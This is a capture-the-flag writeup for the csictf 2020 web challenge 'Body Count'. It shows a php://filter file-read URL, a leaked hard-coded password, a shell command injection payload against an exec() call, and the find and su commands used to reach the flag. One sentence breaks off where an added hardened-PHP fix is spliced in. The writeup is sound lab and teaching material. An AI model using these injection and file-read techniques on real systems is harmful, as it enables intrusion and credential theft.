csictf 2020

CTF Writeup - https://ctftime.org/event/1081

21 July 2020

Body Count

by anishbadhri

Here’s a character count service for you!

http://chall.csivit.com:30202

Solution

On inspecting the response, there is a cookie called password whose value is PASSWORD.

robots.txt disallows the file checkpass.php. To read its source, we can use PHP's built-in php://filter stream wrapper through the file parameter: http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=checkpass.php. This returns the base64 encoding of checkpass.php.

checkpass.php

<?php
$password = "w0rdc0unt123";
// Cookie password.
echo "IMPORTANT!!! The page is still under development. This has a secret, do not push this page.";

header('Location: /');

Thus, the password is w0rdc0unt123. Setting this as the cookie value reveals a new page.

Finding how the character count is executed and getting a shell

This first needs the contents of wc.php, obtained the same way: http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=wc.php.

wc.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>wc as a service</title>
    <style>
        html,
        body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>

<body style="height: 100vh; text-align: center; background-color: black; color: white; display: flex; flex-direction: column; justify-content: center;">
    <?php
    ini_set('max_execution_time', 5);
    if ($_COOKIE['password'] !== getenv('PASSWORD')) {
        setcookie('password', 'PASSWORD');
        die('Sorry, only people from csivit are allowed to access this page.');
    }
    ?>

    <h1>Character Count as a Service</h1>
    <form>
        <input type="hidden" value="wc.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="text" rows=30 cols=100></textarea><br />
        <input type="submit">
    </form>
    <?php
    if (isset($_GET["text"])) {
        $text = $_GET["text"];
        echo "<h2>The Character Count is: " . exec('printf \'' . $text . '\' | wc -c') . "</h2>";
    }
    ?>
</body>

</html>

The command is executed as printf '{text}' | wc -c, with the user-supplied text placed unquoted inside the single quotes. It can be exploited by passing '; {command} # as the value of text, where command is any Linux shell command: the leading quote closes printf's argument, the semicolon ends that command, and # comments out the rest of the line. This basically
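As an added example (not the challenge's own code), the handlers below close the two weaknesses this writeup relies on: the unrestricted ?file= include and the unquoted argument passed to exec(). The front page's include logic is not shown on the page, so the allowlist map and file names are assumptions.

```php
<?php
// Hardened counterparts to the weaknesses in wc.php (added example, not the
// challenge's code; the $allowed map and file names are assumptions).

// 1. File inclusion: only include one of a fixed set of pages, never a raw
//    user-supplied path or a stream wrapper such as php://filter.
function includePage(string $requested): void
{
    $allowed = ['wc' => __DIR__ . '/wc.php']; // assumed allowlist
    if (!array_key_exists($requested, $allowed)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $allowed[$requested];
}

// 2. Access check: constant-time comparison, and fail closed when the
//    expected secret is not configured or the cookie is absent.
function isAuthorised(?string $cookie): bool
{
    $expected = getenv('PASSWORD');
    if ($expected === false || $cookie === null) {
        return false;
    }
    return hash_equals($expected, $cookie);
}

// 3. Character count without a shell. strlen() counts bytes, which is what
//    `wc -c` reports; mb_strlen() would count characters instead.
function characterCount(string $text): int
{
    return strlen($text);
}

// If a shell command were unavoidable, the value must go through
// escapeshellarg(), which wraps it in single quotes and escapes any embedded
// ones, so a payload like "'; id #" stays one literal argument. Passing a
// fixed %s format also stops printf from interpreting % and \ sequences.
function characterCountViaShell(string $text): int
{
    $out = exec('printf %s ' . escapeshellarg($text) . ' | wc -c');
    return (int) trim((string) $out);
}
```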

Locating flag

This can be done with the find command:

find / -iname "*flag*" 

This returns the location of the flag as /ctf/system/of/a/down/flag.txt. However, trying to cat this file fails. The reason can be seen by running

ls -l /ctf/system/of/a/down/flag.txt

The file is readable only by root and the user ctf, so reading it requires the password of root or ctf.

On searching the rest of the file system, the file /ctf/README can be found. Viewing this file returns

My password hash is 6f246c872cbf0b7fd7530b7aa235e67e.

With a few attempts at cracking this hash, the original string that produces it is csictf. Running the cat command as the user ctf returns the flag.

echo "csictf" | su ctf -c "cat /ctf/system/of/a/down/flag.txt" 

Flag

csictf{1nj3ct10n_15_p41nfu1}
tags: Web